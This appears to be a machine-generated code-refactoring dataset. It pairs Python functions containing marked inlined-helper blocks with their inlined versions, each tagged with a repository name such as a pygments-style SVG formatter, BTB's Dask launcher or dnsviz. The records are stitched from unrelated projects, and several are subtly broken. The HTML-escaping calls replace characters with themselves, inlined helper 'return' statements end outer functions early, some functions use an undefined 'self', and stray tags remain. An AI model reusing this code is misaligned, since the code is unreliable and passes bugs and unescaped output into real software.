outfile.write('<?xml version="1.0"?>\n')
outfile.write('<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">\n')
outfile.write('<svg xmlns="http://www.w3.org/2000/svg">\n')
outfile.write('<g font-family="%s" font-size="%s">\n' % (self.fontfamily, self.fontsize))
counter = self.linenostart
counter_step = self.linenostep
<DeepExtract>
if Comment in self._stylecache:
counter_style = self._stylecache[Comment]
otokentype = Comment
while not self.style.styles_token(Comment):
Comment = Comment.parent
value = self.style.style_for_token(Comment)
result = ''
if value['color']:
result = ' fill="#' + value['color'] + '"'
if value['bold']:
result += ' font-weight="bold"'
if value['italic']:
result += ' font-style="italic"'
self._stylecache[otokentype] = result
counter_style = result
</DeepExtract>
line_x = x
if self.linenos:
if counter % counter_step == 0:
outfile.write('<text x="%s" y="%s" %s text-anchor="end">%s</text>' % (x + self.linenowidth, y, counter_style, counter))
line_x += self.linenowidth + self.ystep
counter += 1
outfile.write('<text x="%s" y="%s" xml:space="preserve">' % (line_x, y))
for (ttype, value) in tokensource:
<DeepExtract>
if ttype in self._stylecache:
style = self._stylecache[ttype]
otokentype = ttype
while not self.style.styles_token(ttype):
ttype = ttype.parent
value = self.style.style_for_token(ttype)
result = ''
if value['color']:
result = ' fill="#' + value['color'] + '"'
if value['bold']:
result += ' font-weight="bold"'
if value['italic']:
result += ' font-style="italic"'
self._stylecache[otokentype] = result
style = result
</DeepExtract>
tspan = style and '<tspan' + style + '>' or ''
tspanend = tspan and '</tspan>' or ''
<DeepExtract>
value = value.replace('&', '&').replace('<', '<').replace('>', '>').replace('"', '"').replace("'", ''')
</DeepExtract>
if self.spacehack:
value = value.expandtabs().replace(' ', ' ')
parts = value.split('\n')
for part in parts[:-1]:
outfile.write(tspan + part + tspanend)
y += self.ystep
outfile.write('</text>\n')
if self.linenos and counter % counter_step == 0:
outfile.write('<text x="%s" y="%s" text-anchor="end" %s>%s</text>' % (x + self.linenowidth, y, counter_style, counter))
counter += 1
outfile.write('<text x="%s" y="%s" xml:space="preserve">' % (line_x, y))
outfile.write(tspan + parts[-1] + tspanend)
outfile.write('</text>')
if not self.nowrap:
outfile.write('</g></svg>\n')
|
def format_unencoded(self, tokensource, outfile):
"""
Format ``tokensource``, an iterable of ``(tokentype, tokenstring)``
tuples and write it into ``outfile``.
For our implementation we put all lines in their own 'line group'.
"""
x = self.xoffset
y = self.yoffset
if not self.nowrap:
if self.encoding:
outfile.write('<?xml version="1.0" encoding="%s"?>\n' % self.encoding)
else:
outfile.write('<?xml version="1.0"?>\n')
outfile.write('<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">\n')
outfile.write('<svg xmlns="http://www.w3.org/2000/svg">\n')
outfile.write('<g font-family="%s" font-size="%s">\n' % (self.fontfamily, self.fontsize))
counter = self.linenostart
counter_step = self.linenostep
if Comment in self._stylecache:
counter_style = self._stylecache[Comment]
otokentype = Comment
while not self.style.styles_token(Comment):
Comment = Comment.parent
value = self.style.style_for_token(Comment)
result = ''
if value['color']:
result = ' fill="#' + value['color'] + '"'
if value['bold']:
result += ' font-weight="bold"'
if value['italic']:
result += ' font-style="italic"'
self._stylecache[otokentype] = result
counter_style = result
line_x = x
if self.linenos:
if counter % counter_step == 0:
outfile.write('<text x="%s" y="%s" %s text-anchor="end">%s</text>' % (x + self.linenowidth, y, counter_style, counter))
line_x += self.linenowidth + self.ystep
counter += 1
outfile.write('<text x="%s" y="%s" xml:space="preserve">' % (line_x, y))
for (ttype, value) in tokensource:
if ttype in self._stylecache:
style = self._stylecache[ttype]
otokentype = ttype
while not self.style.styles_token(ttype):
ttype = ttype.parent
value = self.style.style_for_token(ttype)
result = ''
if value['color']:
result = ' fill="#' + value['color'] + '"'
if value['bold']:
result += ' font-weight="bold"'
if value['italic']:
result += ' font-style="italic"'
self._stylecache[otokentype] = result
style = result
tspan = style and '<tspan' + style + '>' or ''
tspanend = tspan and '</tspan>' or ''
value = value.replace('&', '&').replace('<', '<').replace('>', '>').replace('"', '"').replace("'", ''')
if self.spacehack:
value = value.expandtabs().replace(' ', ' ')
parts = value.split('\n')
for part in parts[:-1]:
outfile.write(tspan + part + tspanend)
y += self.ystep
outfile.write('</text>\n')
if self.linenos and counter % counter_step == 0:
outfile.write('<text x="%s" y="%s" text-anchor="end" %s>%s</text>' % (x + self.linenowidth, y, counter_style, counter))
counter += 1
outfile.write('<text x="%s" y="%s" xml:space="preserve">' % (line_x, y))
outfile.write(tspan + parts[-1] + tspanend)
outfile.write('</text>')
if not self.nowrap:
outfile.write('</g></svg>\n')
|
diaphora
|
positive
|
def check_pareto(Y, obj_type=None):
"""
Check pareto optimality of the input performance data
"""
<DeepExtract>
if obj_type is None:
Y = Y
if isinstance(obj_type, str):
obj_type = [obj_type] * Y.shape[1]
assert isinstance(obj_type, Iterable), f'Objective type {type(obj_type)} is not supported'
maxm_idx = np.array(obj_type) == 'max'
Y = Y.copy()
Y[:, maxm_idx] = -Y[:, maxm_idx]
Y = Y
</DeepExtract>
sorted_indices = np.argsort(Y.T[0])
pareto = np.zeros(len(Y), dtype=bool)
for idx in sorted_indices:
if not np.logical_and((Y <= Y[idx]).all(axis=1), (Y < Y[idx]).any(axis=1)).any():
pareto[idx] = True
return pareto
|
def check_pareto(Y, obj_type=None):
"""
Check pareto optimality of the input performance data
"""
if obj_type is None:
Y = Y
if isinstance(obj_type, str):
obj_type = [obj_type] * Y.shape[1]
assert isinstance(obj_type, Iterable), f'Objective type {type(obj_type)} is not supported'
maxm_idx = np.array(obj_type) == 'max'
Y = Y.copy()
Y[:, maxm_idx] = -Y[:, maxm_idx]
Y = Y
sorted_indices = np.argsort(Y.T[0])
pareto = np.zeros(len(Y), dtype=bool)
for idx in sorted_indices:
if not np.logical_and((Y <= Y[idx]).all(axis=1), (Y < Y[idx]).any(axis=1)).any():
pareto[idx] = True
return pareto
|
AutoOED
|
positive
|
def convert_image_to_node(image, input_node=None):
from keras.preprocessing.image import img_to_array
if input_node is None:
<DeepExtract>
config = self.job['config']
input_node = self.layers[0][0]
</DeepExtract>
if input_node['inputType'] == 'image':
image = image.convert('L')
image = img_to_array(image)
elif input_node['inputType'] == 'image_bgr':
image = image.convert('RGB')
image = np.asarray(image, dtype='float32')
image = image[:, :, ::-1].copy()
image = img_to_array(image)
else:
image = image.convert('RGB')
image = img_to_array(image)
if 'imageScale' not in input_node:
input_node['imageScale'] = 255
if float(input_node['imageScale']) > 0:
image = image / float(input_node['imageScale'])
return image
|
def convert_image_to_node(image, input_node=None):
from keras.preprocessing.image import img_to_array
if input_node is None:
config = self.job['config']
input_node = self.layers[0][0]
if input_node['inputType'] == 'image':
image = image.convert('L')
image = img_to_array(image)
elif input_node['inputType'] == 'image_bgr':
image = image.convert('RGB')
image = np.asarray(image, dtype='float32')
image = image[:, :, ::-1].copy()
image = img_to_array(image)
else:
image = image.convert('RGB')
image = img_to_array(image)
if 'imageScale' not in input_node:
input_node['imageScale'] = 255
if float(input_node['imageScale']) > 0:
image = image / float(input_node['imageScale'])
return image
|
aetros-cli
|
positive
|
def run_dask_function(config):
"""Start a Dask Cluster using dask-kubernetes and run a function.
Talks to kubernetes to create `n` amount of new `pods` with a dask worker inside of each
forming a `dask` cluster. Then, a function specified from `config` is being imported and
run with the given arguments. The tasks created by this `function` are being run on the
`dask` cluster for distributed computation.
The config dict must contain the following sections:
* run
* dask_cluster
* output
Args:
config (dict):
Config dictionary.
"""
output_conf = config.get('output')
if output_conf:
path = output_conf.get('path')
if not path:
raise ValueError('An output path must be provided when providing `output`.')
<DeepExtract>
extra_setup = ''
dask_cluster = config['dask_cluster']
metadata = {}
worker_config = dask_cluster.get('worker_config')
if worker_config.get('setup'):
extra_setup = _get_extra_setup(worker_config['setup'])
if False:
name = worker_config.get('image', 'daskdev/dask:latest')
name = '{}-'.format(re.sub('[\\W_]', '-', name))
metadata['generateName'] = name
config_command = CONFIG_TEMPLATE.format(json.dumps(config))
run_command = 'python -u -m btb_benchmark.kubernetes config.json'
extra_setup = '\n'.join([extra_setup, config_command, run_command])
else:
run_command = WORKER_COMM
extra_setup = '\n'.join([extra_setup, run_command])
run_commands = RUN_TEMPLATE.format(extra_setup)
spec = {'metadata': metadata, 'spec': {'restartPolicy': 'Never', 'containers': [{'args': ['-c', run_commands], 'command': ['tini', '-g', '--', '/bin/sh'], 'image': worker_config.get('image', 'daskdev/dask:latest'), 'name': 'dask-worker', 'resources': worker_config.get('resources', {})}]}}
cluster_spec = spec
</DeepExtract>
cluster = KubeCluster.from_dict(cluster_spec)
workers = config['dask_cluster'].get('workers')
if not workers:
cluster.adapt()
elif isinstance(workers, int):
cluster.scale(workers)
else:
cluster.adapt(**workers)
client = Client(cluster)
client.get_versions(check=True)
try:
<DeepExtract>
function = config['run']['function']
function = function.split('.')
function_name = function[-1]
package = '.'.join(function[:-1])
module = importlib.import_module(package)
run = getattr(module, function_name)
</DeepExtract>
kwargs = config['run']['args']
results = run(**kwargs)
finally:
client.close()
cluster.close()
if output_conf:
bucket = output_conf.get('bucket')
try:
if bucket:
aws_key = output_conf.get('key')
aws_secret = output_conf.get('secret_key')
<DeepExtract>
client = boto3.client('s3', aws_access_key_id=aws_key, aws_secret_access_key=aws_secret)
client.put_object(Bucket=bucket, Key=path, Body=_df_to_csv_str(results))
</DeepExtract>
else:
os.makedirs(os.path.dirname(path), exist_ok=True)
results.to_csv(path)
except Exception:
print('Error storing results. Falling back to console dump.')
print(_df_to_csv_str(results))
else:
return results
|
def run_dask_function(config):
"""Start a Dask Cluster using dask-kubernetes and run a function.
Talks to kubernetes to create `n` amount of new `pods` with a dask worker inside of each
forming a `dask` cluster. Then, a function specified from `config` is being imported and
run with the given arguments. The tasks created by this `function` are being run on the
`dask` cluster for distributed computation.
The config dict must contain the following sections:
* run
* dask_cluster
* output
Args:
config (dict):
Config dictionary.
"""
output_conf = config.get('output')
if output_conf:
path = output_conf.get('path')
if not path:
raise ValueError('An output path must be provided when providing `output`.')
extra_setup = ''
dask_cluster = config['dask_cluster']
metadata = {}
worker_config = dask_cluster.get('worker_config')
if worker_config.get('setup'):
extra_setup = _get_extra_setup(worker_config['setup'])
if False:
name = worker_config.get('image', 'daskdev/dask:latest')
name = '{}-'.format(re.sub('[\\W_]', '-', name))
metadata['generateName'] = name
config_command = CONFIG_TEMPLATE.format(json.dumps(config))
run_command = 'python -u -m btb_benchmark.kubernetes config.json'
extra_setup = '\n'.join([extra_setup, config_command, run_command])
else:
run_command = WORKER_COMM
extra_setup = '\n'.join([extra_setup, run_command])
run_commands = RUN_TEMPLATE.format(extra_setup)
spec = {'metadata': metadata, 'spec': {'restartPolicy': 'Never', 'containers': [{'args': ['-c', run_commands], 'command': ['tini', '-g', '--', '/bin/sh'], 'image': worker_config.get('image', 'daskdev/dask:latest'), 'name': 'dask-worker', 'resources': worker_config.get('resources', {})}]}}
cluster_spec = spec
cluster = KubeCluster.from_dict(cluster_spec)
workers = config['dask_cluster'].get('workers')
if not workers:
cluster.adapt()
elif isinstance(workers, int):
cluster.scale(workers)
else:
cluster.adapt(**workers)
client = Client(cluster)
client.get_versions(check=True)
try:
function = config['run']['function']
function = function.split('.')
function_name = function[-1]
package = '.'.join(function[:-1])
module = importlib.import_module(package)
run = getattr(module, function_name)
kwargs = config['run']['args']
results = run(**kwargs)
finally:
client.close()
cluster.close()
if output_conf:
bucket = output_conf.get('bucket')
try:
if bucket:
aws_key = output_conf.get('key')
aws_secret = output_conf.get('secret_key')
client = boto3.client('s3', aws_access_key_id=aws_key, aws_secret_access_key=aws_secret)
client.put_object(Bucket=bucket, Key=path, Body=_df_to_csv_str(results))
else:
os.makedirs(os.path.dirname(path), exist_ok=True)
results.to_csv(path)
except Exception:
print('Error storing results. Falling back to console dump.')
print(_df_to_csv_str(results))
else:
return results
|
BTB
|
positive
|
def _get_gradient(self, out_pattern, expected=None):
"""
computing the gradient of log likelihood
Parameters
----------
out_pattern : array, length out_dim
out_pattern, where gradient is computed
Returns
-------
gradient : dict of arrays
dictionary with name of a variable as a key
"""
assert out_pattern.shape == (self.out_dim,), 'out_pattern must have shape (out_dim,)'
if expected is not None:
assert expected.shape == (self.out_dim,), 'expected must have shape (out_dim,)'
gradient = GaussianDyBM._get_gradient(self, out_pattern)
if expected is None:
<DeepExtract>
mu = VectorRegressionWithVariance._get_mean(self)
for k in range(self.n_etrace):
mu = mu + self.e_trace[k, :].dot(self.variables['V'][k])
expected = mu
</DeepExtract>
dx = (out_pattern - expected) / self.variables['s'] ** 2
dx = dx.ravel()
temp_si = self.si.reshape((self.rnn_dim, 1))
temp_dx = dx.reshape((self.out_dim, 1))
gradient['A'] = amath.dot(temp_dx, amath.transpose(temp_si))
self.SGD.apply_L2_regularization(gradient, self.variables, self.L2)
return gradient
|
def _get_gradient(self, out_pattern, expected=None):
"""
computing the gradient of log likelihood
Parameters
----------
out_pattern : array, length out_dim
out_pattern, where gradient is computed
Returns
-------
gradient : dict of arrays
dictionary with name of a variable as a key
"""
assert out_pattern.shape == (self.out_dim,), 'out_pattern must have shape (out_dim,)'
if expected is not None:
assert expected.shape == (self.out_dim,), 'expected must have shape (out_dim,)'
gradient = GaussianDyBM._get_gradient(self, out_pattern)
if expected is None:
mu = VectorRegressionWithVariance._get_mean(self)
for k in range(self.n_etrace):
mu = mu + self.e_trace[k, :].dot(self.variables['V'][k])
expected = mu
dx = (out_pattern - expected) / self.variables['s'] ** 2
dx = dx.ravel()
temp_si = self.si.reshape((self.rnn_dim, 1))
temp_dx = dx.reshape((self.out_dim, 1))
gradient['A'] = amath.dot(temp_dx, amath.transpose(temp_si))
self.SGD.apply_L2_regularization(gradient, self.variables, self.L2)
return gradient
|
dybm
|
positive
|
def discretize_1d_monomial(n: int, points: List[float]) -> np.ndarray:
"""Discretize the differential operator d^n/dx^n as a convolutional kernel."""
key = (n, tuple(points))
if key not in _1D_KERNEL_CACHE:
assert n < len(points), f"Can't discretize differential operator of order {n} on {len(points)} points, at least {n + 1} points are needed"
<DeepExtract>
weights = finite_diff_weights(n, points, 0)
_1D_KERNEL_CACHE[key] = np.array(weights[-1][-1], dtype=float)
</DeepExtract>
return _1D_KERNEL_CACHE[key]
|
def discretize_1d_monomial(n: int, points: List[float]) -> np.ndarray:
"""Discretize the differential operator d^n/dx^n as a convolutional kernel."""
key = (n, tuple(points))
if key not in _1D_KERNEL_CACHE:
assert n < len(points), f"Can't discretize differential operator of order {n} on {len(points)} points, at least {n + 1} points are needed"
weights = finite_diff_weights(n, points, 0)
_1D_KERNEL_CACHE[key] = np.array(weights[-1][-1], dtype=float)
return _1D_KERNEL_CACHE[key]
|
e2cnn
|
positive
|
@property
def timestamp(self):
if self._timestamp is None:
<DeepExtract>
res = self._api.info(self.hash)
data = res['info'][0]
if len(res['info']) > 1:
print('More than one info for this link, weird')
self._timestamp = datetime.datetime.fromtimestamp(data['created_at'])
if data['global_hash'] == self.hash:
self._is_aggregate = True
else:
self._is_aggregate = False
self._aggregate = Link(self._api, data['global_hash'])
self._title = data['title']
self._user_hash = data['user_hash']
</DeepExtract>
return self._timestamp
|
@property
def timestamp(self):
if self._timestamp is None:
res = self._api.info(self.hash)
data = res['info'][0]
if len(res['info']) > 1:
print('More than one info for this link, weird')
self._timestamp = datetime.datetime.fromtimestamp(data['created_at'])
if data['global_hash'] == self.hash:
self._is_aggregate = True
else:
self._is_aggregate = False
self._aggregate = Link(self._api, data['global_hash'])
self._title = data['title']
self._user_hash = data['user_hash']
return self._timestamp
|
analyst-scripts
|
positive
|
def test_zero(self):
<DeepExtract>
return super(InstanceOf, self).assert_match(__unit__.InstanceOf(int, exact), 0)
</DeepExtract>
<DeepExtract>
return super(InstanceOf, self).assert_no_match(__unit__.InstanceOf(self.Class, exact), 0)
</DeepExtract>
|
def test_zero(self):
return super(InstanceOf, self).assert_match(__unit__.InstanceOf(int, exact), 0)
return super(InstanceOf, self).assert_no_match(__unit__.InstanceOf(self.Class, exact), 0)
</DeepExtract>
|
callee
|
positive
|
def _populate_invalid_response_status(self, query):
self.response_errors[query] = []
for error_info in query.error_info:
for (server, client) in error_info.servers_clients:
for response in error_info.servers_clients[server, client]:
if error_info.code == Q.RESPONSE_ERROR_NETWORK_ERROR:
Errors.DomainNameAnalysisError.insert_into_list(Errors.NetworkError(tcp=response.effective_tcp, errno=errno.errorcode.get(error_info.arg, 'UNKNOWN')), self.response_errors[query], server, client, response)
if error_info.code == Q.RESPONSE_ERROR_FORMERR:
Errors.DomainNameAnalysisError.insert_into_list(Errors.FormError(tcp=response.effective_tcp, msg_size=response.msg_size), self.response_errors[query], server, client, response)
elif error_info.code == Q.RESPONSE_ERROR_TIMEOUT:
attempts = 1
for i in range(len(response.history) - 1, -1, -1):
if response.history[i].action in (Q.RETRY_ACTION_USE_TCP, Q.RETRY_ACTION_USE_UDP):
break
attempts += 1
Errors.DomainNameAnalysisError.insert_into_list(Errors.Timeout(tcp=response.effective_tcp, attempts=attempts), self.response_errors[query], server, client, response)
elif error_info.code == Q.RESPONSE_ERROR_INVALID_RCODE:
if response.effective_edns >= 0 and response.message.edns < 0 and (response.message.rcode() in (dns.rcode.FORMERR, dns.rcode.SERVFAIL, dns.rcode.NOTIMP)):
pass
elif response.effective_edns >= 0 and response.message.edns >= 0 and (response.message.rcode() == dns.rcode.BADVERS):
pass
else:
Errors.DomainNameAnalysisError.insert_into_list(Errors.InvalidRcode(tcp=response.effective_tcp, rcode=dns.rcode.to_text(response.message.rcode())), self.response_errors[query], server, client, response)
elif error_info.code == Q.RESPONSE_ERROR_OTHER:
Errors.DomainNameAnalysisError.insert_into_list(Errors.UnknownResponseError(tcp=response.effective_tcp), self.response_errors[query], server, client, response)
self.response_warnings[query] = []
for referral_info in query.referral_info:
for (server, client) in referral_info.servers_clients:
for response in referral_info.servers_clients[server, client]:
if response.is_authoritative():
Errors.DomainNameAnalysisError.insert_into_list(Errors.AuthoritativeReferral(), self.response_warnings[query], server, client, response)
for truncated_info in query.truncated_info:
for (server, client) in truncated_info.servers_clients:
for response in truncated_info.servers_clients[server, client]:
<DeepExtract>
change_err = None
if response.responsive_cause_index is not None:
retry = response.history[response.responsive_cause_index]
cause_err_class = None
action_err_class = None
cause_err_kwargs = {'tcp': response.responsive_cause_index_tcp}
action_err_kwargs = {}
require_valid = False
dnssec_downgrade_class = None
if retry.cause == Q.RETRY_CAUSE_NETWORK_ERROR:
cause_err_class = Errors.NetworkError
cause_err_kwargs['errno'] = errno.errorcode.get(retry.cause_arg, 'UNKNOWN')
require_valid = False
elif retry.cause == Q.RETRY_CAUSE_FORMERR:
cause_err_class = Errors.FormError
cause_err_kwargs['msg_size'] = response.msg_size
require_valid = True
elif retry.cause == Q.RETRY_CAUSE_TIMEOUT:
cause_err_class = Errors.Timeout
cause_err_kwargs['attempts'] = response.responsive_cause_index + 1
require_valid = False
elif retry.cause == Q.RETRY_CAUSE_RCODE:
if retry.cause_arg in (dns.rcode.FORMERR, dns.rcode.SERVFAIL, dns.rcode.NOTIMP) and self is not None and self.zone.signed:
dnssec_downgrade_class = Errors.DNSSECDowngradeEDNSDisabled
if retry.cause_arg in (dns.rcode.FORMERR, dns.rcode.SERVFAIL, dns.rcode.NOTIMP) and retry.action == Q.RETRY_ACTION_DISABLE_EDNS and (not (self is not None and self.zone.signed)):
pass
elif retry.cause_arg == dns.rcode.BADVERS and retry.action == Q.RETRY_ACTION_CHANGE_EDNS_VERSION:
pass
elif retry.cause_arg == dns.rcode.SERVFAIL and retry.action == Q.RETRY_ACTION_SET_FLAG and (retry.action_arg == dns.flags.CD):
pass
elif retry.cause_arg == 23 and response.server_cookie_status in (Q.DNS_COOKIE_CLIENT_COOKIE_ONLY, Q.DNS_COOKIE_SERVER_COOKIE_BAD) and (retry.action == Q.RETRY_ACTION_UPDATE_DNS_COOKIE):
pass
if retry.cause_arg == dns.rcode.FORMERR and response.server_cookie_status == Q.DNS_COOKIE_IMPROPER_LENGTH and (retry.action == Q.RETRY_ACTION_DISABLE_EDNS or (retry.action == Q.RETRY_ACTION_REMOVE_EDNS_OPTION and retry.action_arg == 10)):
pass
else:
cause_err_class = Errors.InvalidRcode
cause_err_kwargs['rcode'] = dns.rcode.to_text(retry.cause_arg)
require_valid = True
elif retry.cause == Q.RETRY_CAUSE_OTHER:
require_valid = True
action_arg = retry.action_arg
if retry.action == Q.RETRY_ACTION_NO_CHANGE:
pass
elif retry.action == Q.RETRY_ACTION_CHANGE_SPORT:
pass
elif retry.action == Q.RETRY_ACTION_SET_FLAG:
action_err_class = Errors.ResponseErrorWithoutRequestFlag
action_err_kwargs['flag'] = dns.flags.to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
elif retry.action == Q.RETRY_ACTION_CLEAR_FLAG:
action_err_class = Errors.ResponseErrorWithRequestFlag
action_err_kwargs['flag'] = dns.flags.to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
elif retry.action == Q.RETRY_ACTION_DISABLE_EDNS:
action_err_class = Errors.ResponseErrorWithEDNS
dnssec_downgrade_class = Errors.DNSSECDowngradeEDNSDisabled
elif retry.action == Q.RETRY_ACTION_CHANGE_UDP_MAX_PAYLOAD:
action_err_class = Errors.PMTUExceeded
action_err_kwargs['pmtu_lower_bound'] = None
action_err_kwargs['pmtu_upper_bound'] = None
elif retry.action == Q.RETRY_ACTION_SET_EDNS_FLAG:
action_err_class = Errors.ResponseErrorWithoutEDNSFlag
action_err_kwargs['flag'] = dns.flags.edns_to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
elif retry.action == Q.RETRY_ACTION_CLEAR_EDNS_FLAG:
action_err_class = Errors.ResponseErrorWithEDNSFlag
action_err_kwargs['flag'] = dns.flags.edns_to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
if retry.action_arg == dns.flags.DO:
dnssec_downgrade_class = Errors.DNSSECDowngradeDOBitCleared
elif retry.action == Q.RETRY_ACTION_ADD_EDNS_OPTION:
action_err_class = Errors.ResponseErrorWithoutEDNSOption
action_err_kwargs['option'] = fmt.EDNS_OPT_DESCRIPTIONS.get(retry.action_arg, retry.action_arg)
elif retry.action == Q.RETRY_ACTION_REMOVE_EDNS_OPTION:
action_err_class = Errors.ResponseErrorWithEDNSOption
action_err_kwargs['option'] = fmt.EDNS_OPT_DESCRIPTIONS.get(retry.action_arg, retry.action_arg)
elif retry.action == Q.RETRY_ACTION_CHANGE_EDNS_VERSION:
action_err_class = Errors.ResponseErrorWithEDNSVersion
action_err_kwargs['edns_old'] = response.query.edns
action_err_kwargs['edns_new'] = retry.action_arg
action_arg = response.query.edns
if cause_err_class is not None and action_err_class is not None:
if self is not None and self.zone.server_responsive_for_action(server, client, response.responsive_cause_index_tcp, retry.action, action_arg, require_valid):
query_specific = True
else:
query_specific = False
cause_err = cause_err_class(**cause_err_kwargs)
change_err = action_err_class(response_error=cause_err, query_specific=query_specific, **action_err_kwargs)
if change_err is not None:
if dnssec_downgrade_class is not None and self is not None and self.zone.signed:
Errors.DomainNameAnalysisError.insert_into_list(change_err, self.response_errors[query], server, client, response)
Errors.DomainNameAnalysisError.insert_into_list(dnssec_downgrade_class(response_error=cause_err), self.response_errors[query], server, client, response)
else:
Errors.DomainNameAnalysisError.insert_into_list(change_err, self.response_warnings[query], server, client, response)
</DeepExtract>
<DeepExtract>
query = response.query
if self is not None:
if response.is_complete_response():
group = self.response_errors[query]
else:
group = self.response_warnings[query]
if self.analysis_type == ANALYSIS_TYPE_AUTHORITATIVE:
if not response.is_authoritative():
ds_referral = False
mygrp = group
if query.rdtype == dns.rdatatype.DS:
if not self.zone.signed:
mygrp = self.response_warnings[query]
if response.is_referral(query.qname, query.rdtype, query.rdclass, self.name):
ds_referral = True
if ds_referral:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ReferralForDSQuery(parent=fmt.humanize_name(self.name)), mygrp, server, client, response)
else:
Errors.DomainNameAnalysisError.insert_into_list(Errors.NotAuthoritative(), mygrp, server, client, response)
elif self.analysis_type == ANALYSIS_TYPE_RECURSIVE:
if response.recursion_desired() and (not response.recursion_available()):
Errors.DomainNameAnalysisError.insert_into_list(Errors.RecursionNotAvailable(), group, server, client, response)
if response.is_complete_response() and response.message.rcode() == dns.rcode.NOERROR and (self.nxdomain_ancestor is not None):
Errors.DomainNameAnalysisError.insert_into_list(Errors.InconsistentNXDOMAINAncestry(qname=fmt.humanize_name(response.query.qname), ancestor_qname=fmt.humanize_name(self.nxdomain_ancestor.name)), self.response_errors[query], server, client, response)
</DeepExtract>
<DeepExtract>
if response.message is None:
return
edns_errs = []
if response.effective_edns >= 0:
if response.message.edns < 0:
if [x for x in response.message.answer if x.rdtype == dns.rdatatype.RRSIG]:
edns_errs.append(Errors.EDNSSupportNoOpt())
else:
edns_errs.append(Errors.EDNSIgnored())
else:
if response.message.rcode() == dns.rcode.BADVERS:
if response.message.edns >= response.effective_edns:
edns_errs.append(Errors.ImplementedEDNSVersionNotProvided(request_version=response.effective_edns, response_version=response.message.edns))
elif response.message.edns != response.effective_edns:
edns_errs.append(Errors.EDNSVersionMismatch(request_version=response.effective_edns, response_version=response.message.edns))
undefined_edns_flags_set = response.message.ednsflags & 65535 & ~EDNS_DEFINED_FLAGS
if undefined_edns_flags_set:
edns_errs.append(Errors.EDNSUndefinedFlagsSet(flags=undefined_edns_flags_set))
elif response.message.edns >= 0:
edns_errs.append(Errors.GratuitousOPT())
for edns_err in edns_errs:
Errors.DomainNameAnalysisError.insert_into_list(edns_err, self.response_warnings[query], server, client, response)
</DeepExtract>
<DeepExtract>
if response.message is None:
return
cookie_errs = []
try:
cookie_opt = [o for o in response.effective_edns_options if o.otype == 10][0]
except IndexError:
cookie_opt = None
try:
cookie_opt_from_server = [o for o in response.message.options if o.otype == 10][0]
except IndexError:
cookie_opt_from_server = None
supports_cookies = self is not None and server in self.cookie_jar
if response.query.edns < 0 or cookie_opt is None:
if cookie_opt_from_server is not None:
cookie_errs.append(Errors.GratuitousCookie())
elif supports_cookies:
if response.server_cookie_status == Q.DNS_COOKIE_IMPROPER_LENGTH:
issued_formerr = False
if response.effective_server_cookie_status == Q.DNS_COOKIE_IMPROPER_LENGTH:
if response.message.rcode() == dns.rcode.FORMERR:
issued_formerr = True
elif response.responsive_cause_index is not None:
retry = response.history[response.responsive_cause_index]
if retry.cause == Q.RETRY_CAUSE_RCODE and retry.cause_arg == dns.rcode.FORMERR and (retry.action == Q.RETRY_ACTION_DISABLE_EDNS or (retry.action == Q.RETRY_ACTION_REMOVE_EDNS_OPTION and retry.action_arg == 10)):
issued_formerr = True
if not issued_formerr:
cookie_errs.append(Errors.MalformedCookieWithoutFORMERR())
if response.server_cookie_status in (Q.DNS_COOKIE_CLIENT_COOKIE_ONLY, Q.DNS_COOKIE_SERVER_COOKIE_BAD):
if response.server_cookie_status == Q.DNS_COOKIE_CLIENT_COOKIE_ONLY:
err_cls = Errors.NoServerCookieWithoutBADCOOKIE
else:
err_cls = Errors.InvalidServerCookieWithoutBADCOOKIE
issued_badcookie = False
if response.effective_server_cookie_status in (Q.DNS_COOKIE_CLIENT_COOKIE_ONLY, Q.DNS_COOKIE_SERVER_COOKIE_BAD):
if cookie_opt_from_server is None:
cookie_errs.append(Errors.NoCookieOption())
elif len(cookie_opt_from_server.data) == 8:
cookie_errs.append(Errors.NoServerCookie())
if response.message.rcode() == 23:
issued_badcookie = True
elif response.responsive_cause_index is not None:
retry = response.history[response.responsive_cause_index]
if retry.cause == Q.RETRY_CAUSE_RCODE and retry.cause_arg == 23 and (retry.action == Q.RETRY_ACTION_UPDATE_DNS_COOKIE):
issued_badcookie = True
if self._strict_cookies and (not issued_badcookie):
cookie_errs.append(err_cls())
if response.effective_server_cookie_status == Q.DNS_COOKIE_SERVER_COOKIE_FRESH:
if cookie_opt_from_server is None:
cookie_errs.append(Errors.NoCookieOption())
elif len(cookie_opt_from_server.data) == 8:
cookie_errs.append(Errors.NoServerCookie())
if cookie_opt is not None and cookie_opt_from_server is not None:
if len(cookie_opt_from_server.data) >= 8 and cookie_opt_from_server.data[:8] != cookie_opt.data[:8]:
cookie_errs.append(Errors.ClientCookieMismatch())
if len(cookie_opt_from_server.data) < 8 or len(cookie_opt_from_server.data) > 40:
cookie_errs.append(Errors.CookieInvalidLength(length=len(cookie_opt_from_server.data)))
for cookie_err in cookie_errs:
Errors.DomainNameAnalysisError.insert_into_list(cookie_err, self.response_warnings[query], server, client, response)
</DeepExtract>
<DeepExtract>
query = response.query
cls = query.rdclass
if response.message is None:
return
ans_cls = [r.rdclass for r in response.message.answer if r.rdclass != cls]
auth_cls = [r.rdclass for r in response.message.authority if r.rdclass != cls]
add_cls = [r.rdclass for r in response.message.additional if r.rdclass != cls and r.rdtype != dns.rdatatype.SIG]
if ans_cls:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ForeignClassDataAnswer(cls=dns.rdataclass.to_text(ans_cls[0])), self.response_warnings[query], server, client, response)
if auth_cls:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ForeignClassDataAuthority(cls=dns.rdataclass.to_text(auth_cls[0])), self.response_warnings[query], server, client, response)
if add_cls:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ForeignClassDataAdditional(cls=dns.rdataclass.to_text(add_cls[0])), self.response_warnings[query], server, client, response)
</DeepExtract>
<DeepExtract>
query = response.query
msg = response.message
if msg.question and query.qname.to_text() != msg.question[0].name.to_text():
